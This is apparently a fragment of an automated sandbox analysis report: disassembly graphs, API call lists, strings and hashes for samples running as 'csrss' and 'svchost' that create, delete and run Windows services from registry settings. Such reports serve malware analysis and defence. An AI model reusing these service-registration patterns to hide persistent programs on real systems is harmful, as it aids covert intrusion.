                            • Part of subcall function 004010E0: CloseServiceHandle.ADVAPI32(?), ref: 00401177
                          Memory Dump Source
                          • Source File: 00000009.00000002.2151583139.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.2151572483.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000009.00000002.2151598015.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000009.00000002.2151609720.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_csrss.jbxd
                          Similarity
                          • API ID: FileHandle$CloseCommandEnvironmentInfoLineManagerModuleNameOpenServiceStartupStringsTypeVersion
                          • String ID:
                          • API String ID: 196492355-0
                          • Opcode ID: 9fa040449c98ef55911817284c045c467df2bef523b6382b50ee53838fc37c9a
                          • Instruction ID: 557d7318bcc6d0f15c327a05e72f74017b807eec02a523ce4e21715234ef6ed4
                          • Opcode Fuzzy Hash: 9fa040449c98ef55911817284c045c467df2bef523b6382b50ee53838fc37c9a
                          • Instruction Fuzzy Hash: C7118EB1D046019BC700EFA9EE497597BA8FB08314F10463EF915B73E1DB7865008B9E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 111 402e56-402e70 112 402e72-402e74 111->112 113 402e79-402e7f 111->113 112->113 114 402e81 113->114 115 402e83-402e95 VirtualAlloc 113->115 114->115 116 402e97-402ec2 call 402eda 115->116 117 402ecd 115->117 121 402ec4-402eca call 402f87 116->121 122 402ed6-402ed8 116->122 118 402ed2-402ed5 117->118 121->117 122->118
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,00200FFF,00002000,00000004,00000000,0040410C,?,00402E3C,FFFFFFFF,00401887,0040284B,00000000,?,0040288A,0040284B,?), ref: 00402E8D
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.2151583139.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.2151572483.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000009.00000002.2151598015.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000009.00000002.2151609720.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_csrss.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: K(@
                          • API String ID: 4275171209-2819576841
                          • Opcode ID: af9e6b7342db7efb74fcd997a3813977fa84af1b756f5919dc2a68c4d0e77775
                          • Instruction ID: 791a23ae568cd74810a4191716c43d0d1db44035dedb9d925fb705f0d1067edf
                          • Opcode Fuzzy Hash: af9e6b7342db7efb74fcd997a3813977fa84af1b756f5919dc2a68c4d0e77775
                          • Instruction Fuzzy Hash: D401F7B2A442015BE3109B289E4DB1236989BD4361F14053EE619FE3D1D2B19951C7EE

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 125 40120d-401228 126 401269-40127d call 40128c 125->126 127 40122a-401231 125->127 135 401289-40128b 126->135 136 40127f-401283 ExitProcess 126->136 129 401233-401242 127->129 130 401257-401266 call 40128c 127->130 129->130 133 401244-401248 129->133 130->126 137 40124a 133->137 138 40124c-401255 133->138 137->138 138->130 138->133
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.2151583139.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.2151572483.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000009.00000002.2151598015.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000009.00000002.2151609720.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_csrss.jbxd
                          Similarity
                          • API ID: ExitProcess
                          • String ID:
                          • API String ID: 621844428-0
                          • Opcode ID: 3b66b64bee8deabab78ae2e2db559e229a8da94d12edb63b6b1d3c2dc3f4ea9a
                          • Instruction ID: 893734189fc4731028e072c868556611a03e55db0286ce8881573b539ccf3b0e
                          • Opcode Fuzzy Hash: 3b66b64bee8deabab78ae2e2db559e229a8da94d12edb63b6b1d3c2dc3f4ea9a
                          • Instruction Fuzzy Hash: 10F0A4309952119BDB206B64EE85B9A3254975070AF1080BFF844B22F0C7786C88CEAF

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 139 402675-40268b VirtualAlloc 140 402691-4026b2 139->140 141 40268d-40268f 139->141 142 4026b4-4026bd 140->142 143 4026bf-4026c5 140->143 144 4026ca 141->144 142->142 142->143 143->144
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,00001000,00001000,00000004,004026D9,00402936,0040284B,00000000,004028E1,00000000,0040284B,?), ref: 00402683
                          Memory Dump Source
                          • Source File: 00000009.00000002.2151583139.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.2151572483.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000009.00000002.2151598015.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000009.00000002.2151609720.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_csrss.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 02f45a5111896457e3621add05723a4d791ec2d9cfc6282688b6e3778ed80c70
                          • Instruction ID: 33a3f408d18bd989b8eb3651cab89eff2002b1ff003aa8633f4705f1afed6cf9
                          • Opcode Fuzzy Hash: 02f45a5111896457e3621add05723a4d791ec2d9cfc6282688b6e3778ed80c70
                          • Instruction Fuzzy Hash: 20F0E5B03402024BE7199F50CE147643691E795742F108979D105EE7E0E7FD88828B5C

                          Control-flow Graph

                          APIs
                          • OpenServiceA.ADVAPI32(?,00000000,000F01FF,0040115C,00000000), ref: 00401081
                          • GetLastError.KERNEL32 ref: 00401090
                          • DeleteService.ADVAPI32(00000000), ref: 004010AB
                          Strings
                          • DeleteService SUCCESS, xrefs: 004010B5
                          • failure: OpenService (0x%02x), xrefs: 00401097
                          • failure: DeleteService (0x%02x), xrefs: 004010CA
                          Memory Dump Source
                          • Source File: 00000009.00000002.2151583139.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.2151572483.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000009.00000002.2151598015.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000009.00000002.2151609720.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_csrss.jbxd
                          Similarity
                          • API ID: Service$DeleteErrorLastOpen
                          • String ID: DeleteService SUCCESS$failure: DeleteService (0x%02x)$failure: OpenService (0x%02x)
                          • API String ID: 454676605-726450440
                          • Opcode ID: fde4cc135ab0bb6c9e28ecdd27443b69e0f60a6eb45206539a0b1921c010616d
                          • Instruction ID: 272da668a857345a512cb22de84e59a3cbeeafc3a06c0315aca7f0d38e50a0fb
                          • Opcode Fuzzy Hash: fde4cc135ab0bb6c9e28ecdd27443b69e0f60a6eb45206539a0b1921c010616d
                          • Instruction Fuzzy Hash: 3DF0A7B1944602ABD6007B60AF09D1735687A64701740403EF745F92E0EE7C8444C63E

                          Control-flow Graph

                          APIs
                          • CreateServiceA.ADVAPI32(?,00000000,00000000,000F01FF,00000010,00000002,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,0040116E,00000000), ref: 00401028
                          • GetLastError.KERNEL32 ref: 00401037
                          • CloseServiceHandle.ADVAPI32(?), ref: 00401061
                          Strings
                          • failure: CreateService (0x%02x), xrefs: 0040103E
                          • CreateService SUCCESS at creating: %s You must now go to the Registry and the Services applet in the Control Panel and edit them as per the instructions., xrefs: 0040104E
                          Memory Dump Source
                          • Source File: 00000009.00000002.2151583139.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.2151572483.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000009.00000002.2151598015.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000009.00000002.2151609720.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_csrss.jbxd
                          Similarity
                          • API ID: Service$CloseCreateErrorHandleLast
                          • String ID: CreateService SUCCESS at creating: %s You must now go to the Registry and the Services applet in the Control Panel and edit them as per the instructions.$failure: CreateService (0x%02x)
                          • API String ID: 2127812319-1037287075
                          • Opcode ID: 150e2e4bc492a989ce0bd905fac70f6ca53d8e8102423b052fd734e68f1cea50
                          • Instruction ID: 99604f07e3bc1c4aaa2105adba5a1a4a8c183297963d4f730b0e463157307193
                          • Opcode Fuzzy Hash: 150e2e4bc492a989ce0bd905fac70f6ca53d8e8102423b052fd734e68f1cea50
                          • Instruction Fuzzy Hash: F4F0E2B178431177E1206750BE0BFC73A189BA4B51F110039F744BE1E1CAF4A48487AE

                          Execution Graph

                          Execution Coverage:26.8%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:2.2%
                          Total number of Nodes:138
                          Total number of Limit Nodes:3
                          execution_graph 420 1001390 421 10013e7 420->421 424 10013a7 SetServiceStatus 420->424 422 1001442 TerminateProcess 421->422 423 10013f9 wsprintfA OpenEventA 421->423 428 1001453 GetLastError 422->428 429 1001455 SetServiceStatus 422->429 426 1001436 GetLastError 423->426 427 100142b SetEvent 423->427 430 1001485 424->430 431 10013dc GetLastError 424->431 432 1001438 CloseHandle 426->432 427->426 427->432 428->429 429->430 433 1001483 GetLastError 429->433 434 100229a 3 API calls 430->434 431->430 432->429 433->430 435 100148f 434->435 296 1001493 365 10021e0 296->365 299 1001509 GetLastError 300 100150b RegisterServiceCtrlHandlerA 299->300 301 1001563 300->301 302 100155c GetLastError 300->302 304 1001588 301->304 305 1001578 _stricmp 301->305 303 1001c97 SetServiceStatus 302->303 306 1001cc7 GetLastError 303->306 307 1001ccd 303->307 308 10015a0 _stricmp 304->308 309 10015bf 304->309 305->304 306->307 380 100229a 307->380 308->309 311 10015b0 SetCurrentDirectoryA 308->311 312 10015e1 309->312 315 10015d1 _stricmp 309->315 317 100171e 309->317 311->309 313 10015f8 312->313 312->317 367 1001f82 _open 313->367 314 1001cd8 315->312 317->317 318 100178c RegOpenKeyExA 317->318 318->303 319 10017b7 RegQueryValueExA 318->319 320 10017ed 319->320 321 100183f RegQueryValueExA 319->321 320->321 322 10017f6 _stricmp 320->322 323 100186b 321->323 324 100187d RegQueryValueExA 321->324 326 1001810 _stricmp 322->326 327 1001838 322->327 323->324 339 10018cc 323->339 331 10018b2 324->331 332 1001aa4 RegCloseKey 324->332 325 1001bdb 328 1001bf1 CreateProcessA 325->328 329 1001c3a 325->329 326->327 333 1001824 _stricmp 326->333 327->321 335 1001c81 GetLastError 328->335 336 1001c2f Sleep 328->336 337 1001c40 CreateProcessA 329->337 338 1001c87 329->338 330 100160b 330->325 330->330 331->332 331->339 332->303 334 1001ab6 RegQueryValueExA 332->334 333->321 333->327 341 1001ae6 334->341 342 1001af8 RegQueryValueExA 334->342 335->338 336->329 337->335 343 1001ce2 SetServiceStatus 337->343 338->303 344 1001c8d free 338->344 340 10018d5 339->340 364 10018ea 339->364 345 1001f82 18 API calls 340->345 341->342 352 1001b35 SetCurrentDirectoryA 341->352 348 1001b42 malloc 342->348 349 1001b23 342->349 346 1001d15 343->346 347 1001d0f GetLastError 343->347 344->303 356 10018e1 345->356 350 1001d24 ExitThread 346->350 351 1001d1a free 346->351 347->346 348->303 357 1001b58 348->357 349->348 353 1001b2c 349->353 351->350 352->348 353->348 353->352 354 1001b9e RegQueryValueExA 355 1001bbb 354->355 354->357 358 1001bc4 free 355->358 359 1001bd2 RegCloseKey 355->359 361 1001983 RegQueryValueExA 356->361 356->364 357->354 357->358 360 1001b79 free malloc 357->360 358->359 359->325 360->303 360->354 362 10019c9 361->362 363 1001a2c RegQueryValueExA 361->363 362->334 363->334 363->362 364->361 364->364 366 10014a5 GetDesktopWindow 365->366 366->299 366->300 368 1001fa2 malloc 367->368 370 1001f9b 367->370 369 1001fb5 _read 368->369 368->370 371 1001fd3 malloc 369->371 372 1001fc7 free 369->372 370->330 373 1001fe3 free 371->373 374 1001fec _lseek _read 371->374 372->370 373->370 375 1002038 free free 374->375 376 1002008 374->376 375->370 376->375 377 100200d 376->377 387 1001e2d 377->387 381 10022a2 380->381 382 10022a3 380->382 381->314 383 1002313 GetCurrentProcess TerminateProcess 382->383 384 10022d5 SetUnhandledExceptionFilter 382->384 385 1002330 383->385 386 1002312 384->386 385->314 386->383 388 1001e40 387->388 397 1001e78 free free _close 387->397 388->397 399 1001d65 388->399 390 1001e55 391 1001ec2 390->391 392 1001ea3 strncmp 390->392 390->397 393 1001ed5 strncmp 391->393 394 1001eed 391->394 392->391 392->397 393->394 395 1001f3e 394->395 396 1001f29 strncmp 394->396 394->397 395->397 398 1001f53 strncmp 395->398 396->395 396->397 397->370 398->397 400 1001d71 399->400 401 1001d9f 400->401 402 1001df0 strncmp 400->402 401->390 402->400 402->401 436 1002338 437 1002347 436->437 438 100234e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 436->438 437->438 439 10023bc 437->439 440 1002391 438->440 441 100239b GetModuleHandleA 438->441 440->441 441->439 442 10023ab GetProcAddress 441->442 442->439 443 100219b _XcptFilter 403 100204f 406 100205b 403->406 404 10020be __set_app_type __p__fmode __p__commode 405 1002106 404->405 407 100211b 405->407 408 100210f __setusermatherr 405->408 406->404 416 100227e _controlfp 407->416 408->407 410 1002120 _initterm __getmainargs _initterm 417 1001d2c StartServiceCtrlDispatcherA 410->417 416->410 418 1001d56 GetLastError 417->418 419 1001d5c ExitProcess 417->419 418->419 444 10021af 445 10021c2 _c_exit 444->445 446 10021bb _exit 444->446 447 10021c8 445->447 446->445

                          Callgraph

                          APIs
                          • GetDesktopWindow.USER32 ref: 010014F9
                          • GetLastError.KERNEL32 ref: 01001509
                          • RegisterServiceCtrlHandlerA.ADVAPI32(MyService,Function_00001390), ref: 0100154D
                          • GetLastError.KERNEL32 ref: 0100155C
                          • _stricmp.MSVCRT(?,010011F4), ref: 01001580
                          • _stricmp.MSVCRT(?,010011F0), ref: 010015A8
                          • SetCurrentDirectoryA.KERNEL32(?), ref: 010015B4
                          • _stricmp.MSVCRT(?,010011F4), ref: 010015D9
                          • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00000001,?), ref: 010017A9
                          • RegQueryValueExA.ADVAPI32(?,StartPMShell,00000000,?,?,00000104), ref: 010017E7
                          • _stricmp.MSVCRT(?,yes), ref: 01001808
                          • _stricmp.MSVCRT(?,01001188), ref: 0100181C
                          • _stricmp.MSVCRT(?,01001184), ref: 01001830
                          • RegQueryValueExA.ADVAPI32(?,Application,00000000,?,?,00000104), ref: 01001865
                          • RegQueryValueExA.ADVAPI32(?,Os2App,00000000,?,?,00000104), ref: 010018A1
                          • RegQueryValueExA.ADVAPI32(?,AppParameters,00000000,00000001,?,00000001), ref: 010019C3
                            • Part of subcall function 01001F82: _open.MSVCRT ref: 01001F8C
                          • RegQueryValueExA.ADVAPI32(?,Os2AppParameters,00000000,00000001,?,00000001), ref: 01001A51
                          • RegCloseKey.ADVAPI32(?), ref: 01001AA7
                          • RegQueryValueExA.ADVAPI32(?,AppDirectory,00000000,?,?,00000104), ref: 01001AE0
                          • RegQueryValueExA.ADVAPI32(?,Os2AppDirectory,00000000,?,?,00000104), ref: 01001B1D
                          • SetCurrentDirectoryA.KERNEL32(?), ref: 01001B3C
                          • malloc.MSVCRT ref: 01001B4A
                          • free.MSVCRT(?), ref: 01001B7C
                          • malloc.MSVCRT ref: 01001B8F
                          • RegQueryValueExA.ADVAPI32(?,AppEnvironment,00000000,?,?,00000001), ref: 01001BB5
                          • free.MSVCRT(?), ref: 01001BC7
                          • RegCloseKey.ADVAPI32(?), ref: 01001BD5
                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000210,?,00000000,?,01003060), ref: 01001C29
                          • Sleep.KERNEL32(0000157C), ref: 01001C34
                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000210,?,00000000,?,01003060), ref: 01001C7B
                          • GetLastError.KERNEL32 ref: 01001C81
                          • free.MSVCRT(?), ref: 01001C90
                          • SetServiceStatus.SECHOST(01003040), ref: 01001CBA
                          • GetLastError.KERNEL32 ref: 01001CC7
                          • SetServiceStatus.ADVAPI32(01003040), ref: 01001D05
                          • GetLastError.KERNEL32 ref: 01001D0F
                          • free.MSVCRT(?), ref: 01001D1D
                          • ExitThread.KERNEL32 ref: 01001D25
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2217182264.0000000001001000.00000020.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000012.00000002.2217110982.0000000001000000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_1000000_svchost.jbxd
                          Similarity
                          • API ID: QueryValue$_stricmp$ErrorLast$free$Service$CloseCreateCurrentDirectoryProcessStatusmalloc$CtrlDesktopExitHandlerOpenRegisterSleepThreadWindow_open
                          • String ID: /C $AppDirectory$AppEnvironment$AppParameters$Application$MyService$OS2.EXE /S /P $OS2.EXE /S /P C:\OS2\PMSHELL.EXE /C C:\OS2\PMSHELL.EXE$Os2App$Os2AppDirectory$Os2AppParameters$SYSTEM\CurrentControlSet\Services\$StartPMShell$\Parameters\$yes
                          • API String ID: 1655390068-3056449885
                          • Opcode ID: 02a04abe8bfb2e2af8657e333a14d76804ff8bade4b05f5952c12290805194cf
                          • Instruction ID: f1810a740a50094ef3a85ac764f2ada4c4b3d83ca85b257398eb63aa41ae2fee
                          • Opcode Fuzzy Hash: 02a04abe8bfb2e2af8657e333a14d76804ff8bade4b05f5952c12290805194cf
                          • Instruction Fuzzy Hash: FB42DF719002899FEF37CFA8DD54AEA7BEABF05304F14015AE888AB191D7B1D645CB50

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 164 1001d2c-1001d54 StartServiceCtrlDispatcherA 165 1001d56 GetLastError 164->165 166 1001d5c-1001d5e ExitProcess 164->166 165->166
                          APIs
                          • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 01001D4C
                          • GetLastError.KERNEL32 ref: 01001D56
                          • ExitProcess.KERNEL32 ref: 01001D5E
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2217182264.0000000001001000.00000020.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000012.00000002.2217110982.0000000001000000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_1000000_svchost.jbxd
                          Similarity
                          • API ID: CtrlDispatcherErrorExitLastProcessServiceStart
                          • String ID: MyService
                          • API String ID: 1973872770-3381069429
                          • Opcode ID: 20259ed92dd172a1bf8a678d937350905e92ea1f0c1f3f1c4d421f772e81e018
                          • Instruction ID: 6c5808b0aa48b3482133c95c6351ece2a401c213988ee199fe0397c058dfc28b
                          • Opcode Fuzzy Hash: 20259ed92dd172a1bf8a678d937350905e92ea1f0c1f3f1c4d421f772e81e018
                          • Instruction Fuzzy Hash: 9FE0EC75910249AFEB22EFE4C80C7AD7BB8BB00356F404458E1E091085D7B8C2059B61

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 138 100204f-1002064 call 1002220 141 1002066-1002075 138->141 142 100208e-1002092 138->142 141->142 144 1002077-1002084 141->144 143 10020be-100210d __set_app_type __p__fmode __p__commode call 1002290 142->143 153 100211b-1002179 call 100227e _initterm __getmainargs _initterm call 1001d2c 143->153 154 100210f-100211a __setusermatherr 143->154 145 1002086-100208c 144->145 146 10020a7-10020ae 144->146 145->142 148 1002094-100209b 145->148 146->142 149 10020b0-10020b2 146->149 148->142 151 100209d-10020a5 148->151 152 10020b8-10020bb 149->152 151->152 152->143 158 100217e-100218a 153->158 154->153 159 1002193-10021d3 _cexit call 100225b 158->159 160 100218c-100218d exit 158->160 160->159
                          APIs
                          Memory Dump Source
                          • Source File: 00000012.00000002.2217182264.0000000001001000.00000020.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000012.00000002.2217110982.0000000001000000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_1000000_svchost.jbxd
                          Similarity
                          • API ID: _initterm$__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                          • String ID:
                          • API String ID: 1729372338-0
                          • Opcode ID: 3443f46fcd83b6b43126e535af4daa8a49948fe616d463dbd614ef274d62b5ee
                          • Instruction ID: 7f35cc82decd9221ab9ae48d02a259673b2deab9bce17f586febff392b451224
                          • Opcode Fuzzy Hash: 3443f46fcd83b6b43126e535af4daa8a49948fe616d463dbd614ef274d62b5ee
                          • Instruction Fuzzy Hash: 11316C34A05205DFEB27DFA4E45CAED77B0BB08311F10816AF1D5A62D5DBBA8984CB11

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 167 1001390-10013a5 168 10013e7-10013f7 167->168 169 10013a7-10013a8 167->169 170 1001442-1001451 TerminateProcess 168->170 171 10013f9-1001429 wsprintfA OpenEventA 168->171 172 10013b9 169->172 173 10013aa-10013ab 169->173 177 1001453 GetLastError 170->177 178 1001455-1001481 SetServiceStatus 170->178 175 1001436 GetLastError 171->175 176 100142b-1001434 SetEvent 171->176 174 10013c3-10013d6 SetServiceStatus 172->174 173->174 179 10013ad-10013b7 173->179 180 1001487-1001490 call 100229a 174->180 181 10013dc-10013e2 GetLastError 174->181 182 1001438-1001440 CloseHandle 175->182 176->175 176->182 177->178 183 1001483 GetLastError 178->183 184 1001485-1001486 178->184 179->174 181->180 182->178 183->184 184->180
                          APIs
                          • SetServiceStatus.ADVAPI32(01003040), ref: 010013CE
                          • GetLastError.KERNEL32 ref: 010013DC
                          • wsprintfA.USER32 ref: 0100140C
                          • OpenEventA.KERNEL32(00000002,00000000,?), ref: 0100141F
                          • SetEvent.KERNEL32(00000000), ref: 0100142C
                          • GetLastError.KERNEL32 ref: 01001436
                          • CloseHandle.KERNEL32(00000000), ref: 01001439
                          • TerminateProcess.KERNEL32(00000000), ref: 01001449
                          • GetLastError.KERNEL32 ref: 01001453
                          • SetServiceStatus.ADVAPI32(01003040), ref: 01001479
                          • GetLastError.KERNEL32 ref: 01001483
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2217182264.0000000001001000.00000020.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000012.00000002.2217110982.0000000001000000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_1000000_svchost.jbxd
                          Similarity
                          • API ID: ErrorLast$EventServiceStatus$CloseHandleOpenProcessTerminatewsprintf
                          • String ID: OS2SSService-%d
                          • API String ID: 1122908827-2506375307
                          • Opcode ID: bb560c80344282d4321e029aaa0351389b28f50ab391bf3a175092534b0fc02f
                          • Instruction ID: 4ee4bd815474fb3853e1ce7cfd20a4adb1f26975b34469726d3c9bebcffe08db
                          • Opcode Fuzzy Hash: bb560c80344282d4321e029aaa0351389b28f50ab391bf3a175092534b0fc02f
                          • Instruction Fuzzy Hash: F4216D70A05244AFF733DF69E858B6A7BA8B704744F008069F6C5DA198DBBAC9448F60

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 187 1001f82-1001f99 _open 188 1001fa2-1001fb3 malloc 187->188 189 1001f9b-1001f9d 187->189 191 1001fb5-1001fc5 _read 188->191 192 1001fcf-1001fd1 188->192 190 100204b-100204c 189->190 193 1001fd3-1001fe1 malloc 191->193 194 1001fc7-1001fce free 191->194 195 1002049-100204a 192->195 196 1001fe3-1001fea free 193->196 197 1001fec-1002006 _lseek _read 193->197 194->192 195->190 198 1002045-1002046 196->198 199 1002038-1002044 free * 2 197->199 200 1002008-100200b 197->200 201 1002048 198->201 199->198 200->199 202 100200d-1002036 call 1001e2d free * 2 _close 200->202 201->195 202->201
                          APIs
                          Memory Dump Source
                          • Source File: 00000012.00000002.2217182264.0000000001001000.00000020.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000012.00000002.2217110982.0000000001000000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_1000000_svchost.jbxd
                          Similarity
                          • API ID: _open_readfreemalloc
                          • String ID:
                          • API String ID: 490957225-0
                          • Opcode ID: d3531aca284cde4c7c781bb4a318fe67770edacc999285f655138e42053945ec
                          • Instruction ID: cfdd141dd44b288762a65d755a6dd02082a3e28430f69b765bf10aa8d134cd95
                          • Opcode Fuzzy Hash: d3531aca284cde4c7c781bb4a318fe67770edacc999285f655138e42053945ec
                          • Instruction Fuzzy Hash: E111F0722043156BE632A7296C4CA6B7FAD9F42361F108256F6C5931D2DB7AD4008AB5

                          Control-flow Graph

                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 01002353
                          • GetCurrentProcessId.KERNEL32 ref: 0100235F
                          • GetCurrentThreadId.KERNEL32 ref: 01002367
                          • GetTickCount.KERNEL32 ref: 0100236F
                          • QueryPerformanceCounter.KERNEL32(?), ref: 0100237B
                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 010023A0
                          • GetProcAddress.KERNEL32(00000000,UnhandledExceptionFilter), ref: 010023B1
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2217182264.0000000001001000.00000020.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000012.00000002.2217110982.0000000001000000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_1000000_svchost.jbxd
                          Similarity
                          • API ID: CurrentTime$AddressCountCounterFileHandleModulePerformanceProcProcessQuerySystemThreadTick
                          • String ID: UnhandledExceptionFilter$kernel32.dll
                          • API String ID: 2672014633-2428948374
                          • Opcode ID: 31ff3cc2eb1e754c4632b270902c0d9c24c0316373fcabfcdfb4ef618717bf24
                          • Instruction ID: 3bb8d6d780e99960b3a433570cc32b7a855fc22e8cc9105e50b900049e800ac9
                          • Opcode Fuzzy Hash: 31ff3cc2eb1e754c4632b270902c0d9c24c0316373fcabfcdfb4ef618717bf24
                          • Instruction Fuzzy Hash: 9C01CCB5A012149FEB33EBB4E94C69ABBF8BB08340F414955F9C1EB144E779D5008B90

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 212 1001e2d-1001e3a 213 1001e40-1001e45 212->213 214 1001f7a 212->214 215 1001f73-1001f78 213->215 216 1001e4b-1001e57 call 1001d65 213->216 217 1001f7c-1001f7f 214->217 215->217 220 1001e82-1001e87 216->220 221 1001e59-1001e5e 216->221 220->215 224 1001e8d-1001e95 220->224 222 1001e60-1001e62 221->222 223 1001e78-1001e7d 221->223 222->220 225 1001e64-1001e70 222->225 223->217 224->215 226 1001e9b-1001ea1 224->226 225->223 227 1001e72-1001e76 225->227 228 1001ec2-1001ed3 226->228 229 1001ea3-1001ebc strncmp 226->229 227->220 227->223 230 1001ed5-1001eeb strncmp 228->230 231 1001f06-1001f17 228->231 229->215 229->228 230->231 234 1001eed-1001ef6 230->234 232 1001f19-1001f27 231->232 233 1001f3e-1001f46 231->233 232->233 235 1001f29-1001f3c strncmp 232->235 236 1001f48-1001f51 233->236 237 1001f6c-1001f71 233->237 234->215 238 1001ef8-1001efd 234->238 235->215 235->233 236->237 240 1001f53-1001f6a strncmp 236->240 237->217 238->215 239 1001eff-1001f04 238->239 239->215 239->231 240->215 240->237
                          APIs
                          • strncmp.MSVCRT(00000200,16STUB,00000006,00000000,00000000,00000000,00000000,00000000,01002015,00000000,00000000,00000000), ref: 01001EB1
                          • strncmp.MSVCRT(?,Phar Lap Software, Inc.,00000018,00000000,00000000,00000000,00000000,00000000,01002015,00000000,00000000,00000000), ref: 01001EE0
                          • strncmp.MSVCRT(?,Copyright (C) Rational Systems, Inc.,00000024,00000000,00000000,00000000,00000000,00000000,01002015,00000000,00000000,00000000), ref: 01001F31
                          • strncmp.MSVCRT(?,1-2-3 Preloader,0000000F,00000000,00000000,00000000,00000000,00000000,01002015,00000000,00000000,00000000), ref: 01001F5F
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2217182264.0000000001001000.00000020.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000012.00000002.2217110982.0000000001000000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_1000000_svchost.jbxd
                          Similarity
                          • API ID: strncmp
                          • String ID: 1-2-3 Preloader$16STUB$Copyright (C) Rational Systems, Inc.$Phar Lap Software, Inc.
                          • API String ID: 1114863663-2710097266
